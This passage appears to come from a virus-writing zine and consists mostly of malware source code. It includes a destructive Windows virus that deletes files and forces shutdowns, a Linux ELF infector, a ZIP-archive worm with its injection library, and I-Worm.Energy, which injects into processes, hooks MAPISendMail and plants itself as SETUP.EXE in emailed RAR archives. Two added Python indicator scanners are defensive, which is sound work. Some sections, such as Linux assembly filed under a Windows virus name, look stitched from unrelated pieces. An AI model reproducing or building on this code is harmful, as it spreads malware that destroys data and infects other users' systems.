"http://www.tombraider.com/larasworld/wallpaper.html","LaraCroft.url");
ShellExecute(NULL,"open","LaraCroft.url",NULL,NULL,SW_SHOWNORMAL);
}
if((LaraTime.wDay==25)&&(LaraTime.wMonth==12))
{
MessageBox(NULL,
"Merry christmas by Lara Croft!!!!!!\nHey, your PC is infected by new virus:
Win32.LaraCroft\n\nJoyeux Noel de la part de Lara Croft!!!!!!\nTon PC est infecté par
Win32.LaraCroft fabriqué par ZeMacroKiller98",
"Lara Croft like you, don't you",
MB_OK|MB_ICONEXCLAMATION|MB_SYSTEMMODAL);
SetCurrentDirectory("C:/");
DeleteFile("*.*");
ExitWindowsEx(EWX_REBOOT|EWX_FORCE,0);
}
if(LaraTime.wDay==1)
{
MessageBox(NULL,"Lara Croft is with you!!!!\nAnd don't want you work today....",
"Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
if((LaraTime.wHour>=20)&&(LaraTime.wHour<=6))
{
MessageBox(NULL,"Lara Croft say it's time to stop your PC now!!!!\nAnd go to bed, Ha
Ha Ha ha !!!!!","Win32.LaraCroft",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
ExitWindowsEx(EWX_SHUTDOWN|EWX_FORCE,0);
}
FreeLibrary(ServiceLib);
return 0;
}
────────────────────────────────────────────────────────────[LARACROFT.CPP]───
──────────────────────────────────────────────────────────────[LARACROFT.H]───
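Added example, not part of the zine or of either author's code: a defender-side check, in Python, for the persistence and drop artifacts that the Demiurg data declarations and the Win32.LaraCroft source above write (the RunServices value, the Software\LaraCroft\Install marker key, the Excel macro-security values, and the dropped demiurg.* / LaraCroft.url files). The registry export and the file listing it scans are constructed sample input; the Office 9.0 path is assumed from the version digit Demiurg patches into its 8.0 key string.

```python
"""Offline IoC check for the artifacts shown in the Demiurg and LaraCroft listings.

Scans a .reg export (keys in [brackets], values as "name"=data) and a list of
file paths for the indicators the sources above create. Sample input is
constructed for this example.
"""
import re
from typing import Iterable, List, Optional, Tuple

# (key suffix, value name or None for "key exists", description), all taken from
# the listings above. The 9.0 path is an assumption: Demiurg writes
# "Software\Microsoft\Office\8.0\Excel" and overwrites the version digit.
REG_INDICATORS: List[Tuple[str, Optional[str], str]] = [
    (r"\CurrentVersion\RunServices", "LaraWallpaper",
     "Win32.LaraCroft RunServices autostart"),
    (r"\Software\LaraCroft\Install", None,
     "Win32.LaraCroft infection marker key"),
    (r"\Office\8.0\Excel\Microsoft Excel", "Options6",
     "Excel 97 macro-warning setting touched by Demiurg"),
    (r"\Office\9.0\Excel\Security", "Level",
     "Excel 2000 macro security level touched by Demiurg"),
]

# File names dropped by the sources above; demiurg.xls lives in XLSTART, the
# folder Excel auto-opens, which is what gives the macro dropper persistence.
FILE_INDICATORS = {"demiurg.exe", "demiurg.sys", "demiurg.xls", "laracroft.url"}

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=')


def scan_registry(reg_text: str) -> List[str]:
    """Return one finding per indicator matched in a .reg export."""
    findings: List[str] = []
    current_key = ""
    for raw in reg_text.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            for suffix, value, desc in REG_INDICATORS:
                # Key-existence indicators are checked when the key line is seen.
                if value is None and current_key.lower().endswith(suffix.lower()):
                    findings.append(f"{desc}: {current_key}")
            continue
        value_match = VALUE_RE.match(line)
        if value_match:
            name = value_match.group(1)
            for suffix, value, desc in REG_INDICATORS:
                # Value indicators need both the value name and the parent key.
                if (value is not None and name.lower() == value.lower()
                        and current_key.lower().endswith(suffix.lower())):
                    findings.append(f"{desc}: {current_key}\\{name}")
    return findings


def scan_files(paths: Iterable[str]) -> List[str]:
    """Return the paths whose base name is one of the dropped file names."""
    hits: List[str] = []
    for path in paths:
        base = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base in FILE_INDICATORS:
            hits.append(path)
    return hits


# Constructed sample input: one hit per indicator plus two benign entries, and
# an "Options6" under the wrong key that must not match.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"LaraWallpaper"="C:\\WINDOWS\\NOTEPAD.EXE"
"SystemTray"="SysTray.Exe"

[HKEY_LOCAL_MACHINE\Software\LaraCroft\Install]

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Options]
"Options6"=dword:00000000
"""

SAMPLE_FILES = [
    r"C:\demiurg.exe",
    r"C:\demiurg.sys",
    r"C:\Program Files\Microsoft Office\Office\XLSTART\demiurg.xls",
    r"C:\WINDOWS\NOTEPAD.EXE",
    r"C:\WINDOWS\LaraCroft.url",
]

if __name__ == "__main__":
    for finding in scan_registry(SAMPLE_REG) + scan_files(SAMPLE_FILES):
        print("HIT:", finding)
```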
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
#include <dos.h>
#include <stdlib.h>
#include <stdio.h>
#include <mapi.h>
──────────────────────────────────────────────────────────────[LARACROFT.H]───
────────────────────────────────────────────────────────────[LARACROFT.TXT]───
Name: Win32.LaraCroft
Size: 52736 octets
Author: ZeMacroKiller98
BITS 32
GLOBAL main
SECTION .text
vir_start:
main:
pushf
pushad
mov eax, vir_ends-vir_start
call delta
delta:
pop ebp
sub ebp,delta
db 0x0f,0x31 ; thx to AVP for this, nasm didn't compile rdtsc
; rdtsc
and al,31
jnz no_activarse
mov eax,04ah ; Set Hostname
lea ebx,[Wintah+ebp]
mov ecx,0Ah
int 080h
no_activarse:
Sigue_Leyendo:
push ebx
lea ebx,[esp+0Ah+4] ; EBX -> file name
call Infectar
pop ebx
jmp Sigue_Leyendo
yanohaymas:
; Infection
Infectar:
cdq
inc edx
inc edx
mov ecx,edx
mov eax,5
int 080h
xchg ebx,eax
push ebx
mov eax,013h
loop $
int 080h
mov [esp+0Ch],eax
push ecx
push ebx
inc ecx
push ecx
inc ecx
inc ecx
push ecx
loop $
push eax
push ecx
mov ebx,esp
mov eax,0x5a
int 080h ; mmap(file)
add esp,4*6
mov dh,7
mov ebx,eax
cmp eax,0xFFFFF000 ; Same check as mmap.c does
jbe Continuar
j_cer:
jmp Close ; Failure? Bye...
Continuar:
mov eax,[esp+0Ch]
sub eax,04Ch
add eax,ebx
cmp [eax],dh
jnz j_cer
cmp word[eax+10h],(vir_ends-vir_start)
jb j_cer ; Big enough?
pop eax
sub eax,[ebx+098h]
add eax,dword[ebx+09Ch] ; Make new ep
mov byte [ebx+0ACh],dh
mov dword [ebx+18h],eax
ret
mov eax,1
int 080h
───────────────────────────────────────────────────────────────────[WORM.S]───
;ZIPWORM for Linux
;(c) Vecna 2000
BITS 32
;%define DEBUG 1
global main
extern izip_add
extern izip_maxaddsize
[section .data]
db "elf zip worm vecna", 0
nametable dd name01
dd name02
dd name03
dd name04
dd name05
dot db ".",0
name01 db "Ten motives why linux sux!",0
name02 db "Why Windows is superior to Linux!",0
name03 db "Is Linux for you? Never!",0
name04 db "Is Linux immune to virus? NO!",0
name05 db "zipworm!",0
%ifdef DEBUG
deb_msg0 times 80 db "-"
deb_msg4 db 0dh,0ah,0
deb_msg1 db "Running...",0dh,0ah,0
deb_msg2 db "Exiting to OS",0dh,0ah,0
deb_msg3 db "Opening: ",0
deb_msg5 db "Found worm!",0dh,0ah,0
deb_msg6 db "Worm size: ",0
deb_msg7 db "File search done",0dh,0ah,0
deb_msg8 db "File search init",0dh,0ah,0
deb_msg9 db "Worm in mem!",0dh,0ah,0
deb_msg10 db "Add size: ",0
%endif
mapstruct dd 0
mapsize dd 0
dd 3
dd 1
mapfilehnd dd 0
dd 0
[section .bss]
hostptr resd 1
hostsize resd 1
addsize resd 1
orgsize resd 1
dir_entry resb 0110h
hostbuffer resb 4000h
[section .text]
main:
%ifdef DEBUG
pushad
mov ecx, deb_msg1
call write_console
popad
%endif
cld
push byte 5
mov esi, nametable
pop ecx
.trynextname:
push ecx
lodsd
mov ebx, eax
%ifdef DEBUG
pushad
mov ecx, deb_msg3
call write_console
mov ecx, ebx
call write_console
mov ecx, deb_msg4
call write_console
popad
%endif
sub ecx, ecx
push byte 5h
pop eax
cdq
int 80h
mov ebx, eax
test eax, eax
pop ecx
jns .foundhost
loop .trynextname
jmp .exit
.foundhost:
%ifdef DEBUG
pushad
mov ecx, deb_msg5
call write_console
popad
%endif
cmp esi, dot
jb .no_name_adj
mov esi, nametable
.no_name_adj:
push byte 13h
push byte 2h
sub ecx, ecx
pop edx
pop eax
int 80h
mov [hostsize], eax
%ifdef DEBUG
pushad
mov ecx, deb_msg6
call write_console
mov eax, eax
call write_dword
popad
%endif
push byte 13h
sub ecx, ecx
pop eax
cdq
int 80h
mov ecx, hostbuffer
mov edx, [hostsize]
push byte 3
pop eax
int 80h ;read dropper
push byte 6
pop eax
int 80h ;close file
%ifdef DEBUG
pushad
mov ecx, deb_msg9
call write_console
popad
%endif
push dword [esi]
push dword [hostsize]
call izip_maxaddsize ;eax=size to increase .zip
mov [addsize], eax
%ifdef DEBUG
pushad
mov ecx, deb_msg10
call write_console
mov eax, eax
call write_dword
popad
%endif
push byte 5
mov ebx, dot
sub ecx, ecx
pop eax
cdq
int 80h
mov ebx, eax ;open current dir
%ifdef DEBUG
pushad
mov ecx, deb_msg8
call write_console
popad
%endif
.next_entry:
push byte 59h
mov ecx, dir_entry
pop eax
int 80h ;read directory entry
test eax, eax
jz near .done
pushad
lea ebx, [dir_entry+0ah]
movzx eax, word [dir_entry+8h]
cdq
mov dword [ebx+eax+1], edx ;put 0 marker
push byte 2
push byte 5h
pop eax
pop ecx
%ifdef DEBUG
pushad
mov ecx, ebx
call write_console
mov ecx, deb_msg4
call write_console
popad
%endif
int 80h
test eax, eax
js near .search_next
mov [mapfilehnd], eax
mov ebx, eax
push byte 93
mov ecx, eax
pop eax
int 80h
push byte 90
mov ebx, mapstruct
pop eax
int 80h
cmp eax, 0fffff000h
ja .closehandle
mov ebx, eax
push edi
push eax
push dword [esi]
push dword [hostsize]
mov eax, hostbuffer
push eax
call izip_add
test eax, eax
jz .clean
add [orgsize], eax
.clean:
push byte 91
pop eax
int 80h
push byte 93
mov ecx, [orgsize]
mov ebx, [mapfilehnd]
pop eax
int 80h
.closehandle:
push byte 6
mov ebx, [mapfilehnd]
pop eax
int 80h ;close file
.search_next:
popad
jmp .next_entry
.done:
%ifdef DEBUG
pushad
mov ecx, deb_msg7
call write_console
popad
%endif
.exit:
%ifdef DEBUG
pushad
mov ecx, deb_msg2
call write_console
popad
%endif
push byte 1
sub ebx, ebx
pop eax
int 80h
%ifdef DEBUG
;ecx=string
write_console:
pushad
push byte -1
mov edx, ecx
mov esi, ecx
pop ecx
.count:
inc ecx
lodsb
test al, al
jnz .count
xchg ecx, edx
push byte 4
push byte 1
pop ebx
pop eax
int 80h
popad
ret
%endif
%ifdef DEBUG
;eax=dword
write_dword:
pushad
sub esp, 32
mov edi, esp
push byte 8
pop ecx
.hexchar:
rol eax, 4
push eax
and eax, 01111b
call .table
db "0123456789ABCDEF",0
.table:
pop ebx
xlatb
stosb
pop eax
loop .hexchar
mov eax, 0d0ah
stosd
mov ecx, esp
call write_console
add esp, 32
popad
ret
%endif
%ifdef DEBUG
output_registers:
pushad
mov ecx, deb_msg0
call write_console
call .0001
db "EAX=", 0
.0001:
pop ecx
call write_console
mov eax, eax
call write_dword
call .0002
db "EBX=", 0
.0002:
pop ecx
call write_console
mov eax, ebx
call write_dword
call .0003
db "ECX=", 0
.0003:
pop ecx
call write_console
mov eax, ecx
call write_dword
call .0004
db "EDX=", 0
.0004:
pop ecx
call write_console
mov eax, edx
call write_dword
call .0005
db "ESP=", 0
.0005:
pop ecx
call write_console
mov eax, esp
call write_dword
call .0006
db "EBP=", 0
.0006:
pop ecx
call write_console
mov eax, ebp
call write_dword
call .0007
db "ESI=", 0
.0007:
pop ecx
call write_console
mov eax, esi
call write_dword
call .0008
db "EDI=", 0
.0008:
pop ecx
call write_console
mov eax, edi
call write_dword
mov ecx, deb_msg0
call write_console
popad
ret
%endif
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WORM.S]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WORM.I]ÄÄÄ
param1 equ 4
param2 equ 8
param3 equ 12
param4 equ 16
param5 equ 20
_Push equ 4
BITS 32
%define LINUX 1
%include "izip.i"
%ifdef LINUX
global izip_maxaddsize
global izip_add
global izip_strlen
global izip_crc32
%endif
;push ptr2dropname
;push sizeof_dropper
;call
izip_maxaddsize:
;eax=size that .zip will increase
push dword [esp+param2]
call izip_strlen
lea eax, [eax+eax+(sizeof_zip_central+sizeof_zip_local)]
add eax, [esp+param1]
ret 8
;push sizeof_zip
;push ptr2zip
;push ptr2dropname
;push sizeof_dropper
;push ptr2dropper
;call
izip_add:
;eax=new sizeof_map
pushad
sub esp, _Stack
mov esi, [esp+_Pushad+_Stack+param4]
sub ecx, ecx
.local_hdr:
cmp dword [esi+zip_loc_sign_], zip_local_sign
jne .central_hdr
movzx eax, word [esi+zip_size_fname]
mov edx, dword [esi+zip_ver_ned_to_extr]
mov ebx, dword [esi+zip_file_time]
inc ecx
cmp word [esi+zip_compression_method], 0
jne .seek_next
%ifndef LINUX
mov edi, [esi+zip_local_fname+eax-4]
or edi, 020202000h
sub edi, ".exe"
%else
cmp byte [esi+zip_local_fname+eax-1]
, "!"
%endif
je .error
.seek_next:
movzx edi, word [esi+zip_extra_field_length]
add eax, edi
add eax, dword [esi+zip_compressed_size]
lea esi, [eax+esi+sizeof_zip_local]
jmp .local_hdr
.central_hdr:
jecxz .error
cmp dword [esi+zip_centr_sign_], zip_central_sign
je .insert_local_hdr
.error:
sub ecx, ecx
.exit:
add esp, _Stack
mov [esp+_Pushad_eax], ecx
popad
ret 20
.insert_local_hdr:
mov ecx, [esp+_Pushad+_Stack+param5]
add ecx, [esp+_Pushad+_Stack+param4]
sub ecx, esi
add esi, ecx
push dword [esp+_Pushad+_Stack+param3]
call izip_strlen
lea edi, [esi+eax+sizeof_zip_local]
add edi, [esp+_Pushad+_Stack+param2]
std
rep movsb
mov byte [edi], "P"
cld
xchg edi, esi
xchg ecx, ebx
mov eax, edi
sub eax, [esp+_Pushad+_Stack+param4]
mov dword [esp+rel_str_local_hdr], eax
mov eax, zip_local_sign
stosd
mov eax, edx
stosd ;version/flags
sub eax, eax
stosw ;stored
mov eax, ecx
stosd ;time/date
push dword [esp+_Pushad+_Stack+param2]
push dword [esp+_Pushad+_Stack+param1+_Push]
call izip_crc32
stosd ;crc32
mov eax, [esp+_Pushad+_Stack+param2]
stosd
stosd ;size
mov esi, [esp+_Pushad+_Stack+param3]
push esi
call izip_strlen
sub ecx, ecx
stosw ;name size
xchg eax, ecx
stosw ;extra size
rep movsb ;name
mov ecx, [esp+_Pushad+_Stack+param2]
mov esi, [esp+_Pushad+_Stack+param1]
rep movsb ;copy dropper
mov esi, edi
sub edi, [esp+_Pushad+_Stack+param4]
mov dword [esp+rel_str_central_hdr], edi
.zip_end_hdr:
cmp dword [esi+zip_centr_sign_], zip_central_sign
jne .insert_central_hdr
movzx eax, word [esi+zip_size_fname_]
movzx edx, word [esi+zip_extra_field_length_]
add eax, edx
movzx edx, word [esi+zip_file_comment_length_]
add eax, edx
mov edx, [esi+zip_ver_made_by_]
test byte [esi+zip_extrnl_file_attr_], 10h
jnz .skip_dir
mov ebx, [esi+zip_file_time_]
mov edi, [esi+zip_disk_number_start_]
mov ecx, [esi+zip_flags_]
.skip_dir:
lea esi, [esi+eax+sizeof_zip_central]
jmp .zip_end_hdr
.insert_central_hdr:
cmp dword [esi+zip_end_sign_], zip_end_sign
jne near .error
push dword [esp+_Pushad+_Stack+param3]
call izip_strlen
push eax
pushad
add eax, sizeof_zip_central
lea edi, [esi+eax]
add [esi+size_of_the_central_directory], eax
movzx eax, word [esi+zipfile_comment_length]
lea ecx, [eax+sizeof_zip_end]
add edi, ecx
add esi, ecx
std
rep movsb
mov byte [edi], "P"
cld
popad
xchg edi, esi
mov eax, zip_central_sign
stosd ;sign
mov eax, edx
stosd ;version
mov eax, ecx
stosw ;flag
pop ecx
sub eax, eax
stosw ;method
xchg eax, ebx
stosd ;time/date
push dword [esp+_Pushad+_Stack+param2]
push dword [esp+_Pushad+_Stack+param1+_Push]
call izip_crc32
stosd ;crc32
mov eax, [esp+_Pushad+_Stack+param2]
stosd
stosd ;size
mov eax, ecx
stosw ;name size
xchg eax, ebx
stosd ;extra size
xchg eax, esi
stosd ;disk/attr
%ifndef LINUX
xchg eax, esi ;no file attributes
%else
mov eax, 0816d0000h ;r-xr-xr-x
%endif
stosd ;
mov eax, [esp+rel_str_local_hdr]
stosd
mov esi, [esp+_Pushad+_Stack+param3]
rep movsb
mov esi, edi
.check_end:
cmp dword [esi+zip_end_sign_], zip_end_sign
jne near .error
add dword [esi+ttl_num_of_ent_on_this_disk], 00010001h
mov eax, [esp+rel_str_central_hdr]
mov dword [esi+off_of_strt_of_cent_directory], eax
movzx eax, word [esi+zipfile_comment_length]
lea ecx, [esi+eax+sizeof_zip_end]
sub ecx, [esp+_Pushad+_Stack+param4]
jmp .exit
;push sizeof_data
;push ptr2data
;call
izip_crc32:
;eax=crc32
pushad
mov edx, [esp+_Pushad+param1]
mov ecx, [esp+_Pushad+param2]
push byte -1
pop eax
.bigloop:
xor al, [edx]
inc edx
mov bl, 8
.bitloop:
shr eax, 1
jnc .no_hash
xor eax, 0EDB88320h
.no_hash:
dec bl
jnz .bitloop
loop .bigloop
not eax
mov [esp+_Pushad_eax], eax
popad
ret 8
;push ptr2string
;call
izip_strlen:
;eax=length of the string
pushad
mov esi, [esp+_Pushad+param1]
sub ecx, ecx
.count:
lodsb
test al, al
jz .done
inc ecx
jmp .count
.done:
mov [esp+_Pushad_eax], ecx
popad
ret 4
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[IZIP.S]ÄÄÄ
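As an added defensive example (not part of the zine and not Vecna's code), a Python scanner that walks a ZIP's local file headers in the same order as izip_add's .local_hdr loop, flags stored entries whose name ends in "!" (the marker izip_add itself checks to avoid infecting an archive twice), and verifies each flagged entry's CRC-32 with the same bit-serial 0xEDB88320 loop that izip_crc32 uses. The sample archive is constructed in memory; the "worm" entry is filler text, not a binary.

```python
"""Detect entries carrying the Zipworm insertion pattern in a ZIP archive."""
import io
import struct
import zipfile

ZIP_LOCAL_SIG = 0x04034B50      # "PK\x03\x04", zip_local_sign in izip.i
LOCAL_HDR_FMT = "<IHHHHHIIIHH"  # sig, ver, flags, method, time, date,
                                # crc, csize, usize, name len, extra len
LOCAL_HDR_LEN = struct.calcsize(LOCAL_HDR_FMT)  # 30 == sizeof_zip_local
FLAG_DATA_DESCRIPTOR = 0x0008
METHOD_STORED = 0               # what the worm writes ("stosw ;stored")


def crc32_bitwise(data: bytes) -> int:
    """Table-less CRC-32 (IEEE), the same shift/xor loop as izip_crc32."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xEDB88320
            else:
                crc >>= 1
    return crc ^ 0xFFFFFFFF


def walk_local_headers(blob: bytes):
    """Yield (name, method, header_crc, data) per local header, stopping at
    the first non-local signature (the central directory), like .local_hdr."""
    off = 0
    while off + LOCAL_HDR_LEN <= len(blob):
        (sig, _ver, flags, method, _time, _date, crc, csize, _usize,
         nlen, xlen) = struct.unpack_from(LOCAL_HDR_FMT, blob, off)
        if sig != ZIP_LOCAL_SIG:
            break
        if flags & FLAG_DATA_DESCRIPTOR:
            # Sizes live after the data; this simple walker cannot skip them.
            raise ValueError("entry uses a data descriptor; use the central directory")
        name_off = off + LOCAL_HDR_LEN
        name = blob[name_off:name_off + nlen].decode("cp437", "replace")
        data_off = name_off + nlen + xlen
        yield name, method, crc, blob[data_off:data_off + csize]
        off = data_off + csize


def find_zipworm_marks(blob: bytes) -> list:
    """Return (name, size, crc_ok) for entries that are stored (method 0)
    and whose name ends in '!', the two properties the worm's own check keys on."""
    hits = []
    for name, method, crc, data in walk_local_headers(blob):
        if method == METHOD_STORED and name.endswith("!"):
            hits.append((name, len(data), crc32_bitwise(data) == crc))
    return hits


def build_sample_archive() -> bytes:
    """Constructed sample: one ordinary deflated entry plus a stored entry
    named the way the worm names itself (name05 in worm.s)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless text\n",
                    compress_type=zipfile.ZIP_DEFLATED)
        zf.writestr("zipworm!", b"constructed filler, not an ELF",
                    compress_type=zipfile.ZIP_STORED)
    return buf.getvalue()


if __name__ == "__main__":
    for name, size, crc_ok in find_zipworm_marks(build_sample_archive()):
        state = "ok" if crc_ok else "MISMATCH"
        print(f"suspect stored entry {name!r}: {size} bytes, crc {state}")
```

A real triage tool would also read the central directory, where the worm sets the external attributes to 0816d0000h (an executable Unix mode), which the local headers do not carry.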
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE]ÄÄÄ
#!/bin/sh
strip zipworm!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKE]ÄÄÄ
COMMENT #
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ I-Worm.Energy ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ by Benny/29A ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
hey all...
ÄÄÄÄÄÄÄÄÄÄÄ
it was one b0ring sunday, when I decided to code some small and kewl virus...
I was tired from coding large projectz (HIV, XTC)... I wanted to code one
worm with some nice ideaz, like the Win2k.Stream.
and here it is. after some meditationz, full of experiencez from psychedelics
I decided to call this worm "Energy"... it is very small worm, spreading via
RAR filez. it can parse all processes, hook their MAPISendMail API procedure
and infect all attached RAR filez in a message by dropping itself there.
very similar technique of the process's address space manipulationz is
described in my article "Multi-process residency" and Win32.HIV virus. surely
it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps)
also on earlier versionz of Windows NT - but I don't know, I haven't tested it.
it can stay resident in memory as a service, by standard API callz, valid only
in NT systemz. while infecting the RAR archivez it addz itself there under
the "SETUP.EXE" filename, containing also the standard setup icon. I tried to
optimize the source a bit... I know the worm is not super-small, but it is a
resident, heavily armoured, very effective, tiny mail-spreading worm.
after execution:
- anti-* stuff
- if initialized by SCM, run as a service process
- copy worm to system directory as "ENERGY.EXE"
- register worm as service process and run it everytime the OS will start
- enum processes, find MAPI32.dll there and hook MAPISendMail (using many
tricks)
- wait one minute and again
hook_procedure:
- parse embedded filez and search for RAR filez.
- infect them by worm file: SETUP.EXE, mark as read-only (already-infected
mark).
it is possible that worm containz some bugz. yeah, but I don't care... I'm glad
I was able to finish it in 2 dayz and that it was not b0ring. I had fun.
If you would like to consult anything with me, feel free to contact me...
(c) 14th November 2000 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Czech Republic ³ Benny / 29A ÀÄÄÄÄÄÄÄÄÄÄÄ¿
@ benny_29a@privacyx.com ³
@ http://benny29a.cjb.net ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
#
.586p
.model flat ;blablabla
;extrn OpenServiceA:PROC
;extrn DeleteService:PROC ;***debug only!
extrn OpenSCManagerA:PROC
extrn CreateServiceA:PROC
extrn CloseServiceHandle:PROC
extrn StartServiceCtrlDispatcherA:PROC
extrn RegisterServiceCtrlHandlerA:PROC
extrn SetServiceStatus:PROC
.data
db ? ;some data
.code
Start: ;worm code starts here
pushad
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
pop edi
push 0
push edi
push esi
call CopyFileA ;copy worm to sys. dir.
push api_num
pop ecx
call @api_table
dd offset GetModuleHandleA ;adressez of APIz
dd offset GetProcAddress
dd offset VirtualProtect
dd offset CreateFileA
dd offset CloseHandle
dd offset WriteFile
dd offset GetFileSize
dd offset ReadFile
dd offset VirtualFree
dd offset VirtualAlloc
dd offset SetFilePointer
dd offset SetFileAttributesA
api_num = 12
@api_table:
pop ebx
get_apiz:
dec ecx ;decrement counter
mov eax,[ebx+ecx*4]
mov eax,[eax+2]
mov eax,[eax]
mov edx,[esi+ecx*4]
mov [edx],eax ;store API address
test ecx,ecx
jne get_apiz
worm_loop:
mov ebx,offset tmp
push ebx
push PROC_COUNT
mov esi,offset proc_dump
push esi
call EnumProcesses ;enum all processez
dec eax
jne end_seh
worm_wait:
push 60000
call Sleep ;wait one minute
jmp worm_loop ;and try again.
;infect processez
proc_infect Proc
pushad
push eax
push 0
push 2 or 8 or 10h or 20h or 400h
call OpenProcess ;get handle to process
xchg eax,ecx
jecxz end_proc_infect
mov ebx,ecx
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push virtual_end-Start
push 0
push ebx
call VirtualAllocEx ;allocate there memory
xchg eax,ecx ;for worm
jecxz end_proc_infect2
mov esi,ecx
push 0
push virtual_end-Start
push offset Start
push esi
push ebx
call WriteProcessMemory ;copy there worm body
dec eax
jne end_proc_infect3
push -1
push ecx
call WaitForSingleObject ;wait for its termination
call CloseHandle ;and close its handle
jmp end_proc_infect2 ;and quit
end_proc_infect3:
push MEM_RELEASE
push 0
push esi
push ebx
call VirtualFreeEx ;release memory if failed
end_proc_infect2:
push ebx
call CloseHandle ;close handle to process
end_proc_infect:
popad
ret ;and quit
proc_infect EndP
@pushsz 'MAPI32.dll'
mov eax,12345678h
_gmha = dword ptr $-4
call eax ;get address of MAPI32.dll
xchg eax,ecx
jecxz end_seh ;quit if not loaded
@pushsz 'MAPISendMail'
push ecx
mov eax,12345678h
_gpa = dword ptr $-4
call eax ;get address of
xchg eax,ecx ;MAPISendMail API
jecxz end_seh
mov esi,ecx ;to ESI
pushad
mov edi,[esp.cPushad] ;get ptr to message
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
push edi
mov ebx,[esp.cPushad.28]
mov ecx,[ebx+40] ;number of attachmentz
mov ebx,[ebx+44] ;ptr to file fieldz
f_parse:mov esi,[ebx+12]
lea edi,[ebp + arc_buffer - gdelta]
push edi
@copysz
dec edi
cmp byte ptr [edi-1],'\'
je over_slash
mov al,'\'
stosb
over_slash:
mov esi,[ebx+16]
@copysz
or [esi-5],20202020h ;lower case
cmp [esi-5],'rar.'
pop esi ;create path+filename
jne o_r ;quit if not RAR file
call infect_archive ;try to infect this file
o_r: sub ebx,-24
loop f_parse ;try another file in msg
pop edi
call @m_res
old_MAPI_api db 5 dup (90h)
@m_res: pop esi
movsd
movsb ;remove the API hooker
jmp end_seh ;and quit
push 0
push eax
mov eax,12345678h
_gfs = dword ptr $-4
call eax ;get its size
push eax
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push eax
push 0
mov eax,12345678h
_va = dword ptr $-4
call eax ;allocate enough memory
test eax,eax
pop edx
je end_file
xchg eax,ebx
push edx
push 0
lea eax,[ebp + tmp - gd]
push eax
push edx
push ebx
push dword ptr [ebp + hFile - gd]
mov eax,12345678h
_rf = dword ptr $-4 ;and copy there worm
call eax
call close_file ;close handle to file
pop edi
pushad
mov esi,ebx
call CRC32 ;calculate CRC32 of
mov [ebp + RARCRC32 - gd],eax ;the worm file
popad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ or GENERIC_WRITE
push esi
mov eax,12345678h
_cfa = dword ptr $-4
call eax ;open the archive
inc eax
je end_file2
dec eax
mov [ebp + hFile - gd],eax ;save its handle
push 2
push 0
push 0
push eax
mov eax,12345678h
_sfp = dword ptr $-4
call eax ;go to EOF
pushad
lea esi,[ebp + RARHeaderCRC+2 - gd]
push end_RAR-RARHeader-2
pop edi
call CRC32 ;calculate CRC32 of
mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header
popad ;and save it
push 0
lea eax,[ebp + tmp - gd]
push eax
push end_RAR-RARHeader
call end_RAR
RARHeader: ;No comment ;)
RARHeaderCRC dw 0
RARType db 74h
RARFlags dw 8000h
RARHSize dw end_RAR-RARHeader
RARCompressed dd 2000h
RAROriginal dd 2000h
RAROS db 0
RARCRC32 dd 0
RARFileDateTime dd 12345678h
RARNeedVer db 14h
RARMethod db 30h
RARFNameSize dw end_RAR-RARName
RARAttrib dd 0
RARName db 'SETUP.EXE'
end_RAR:
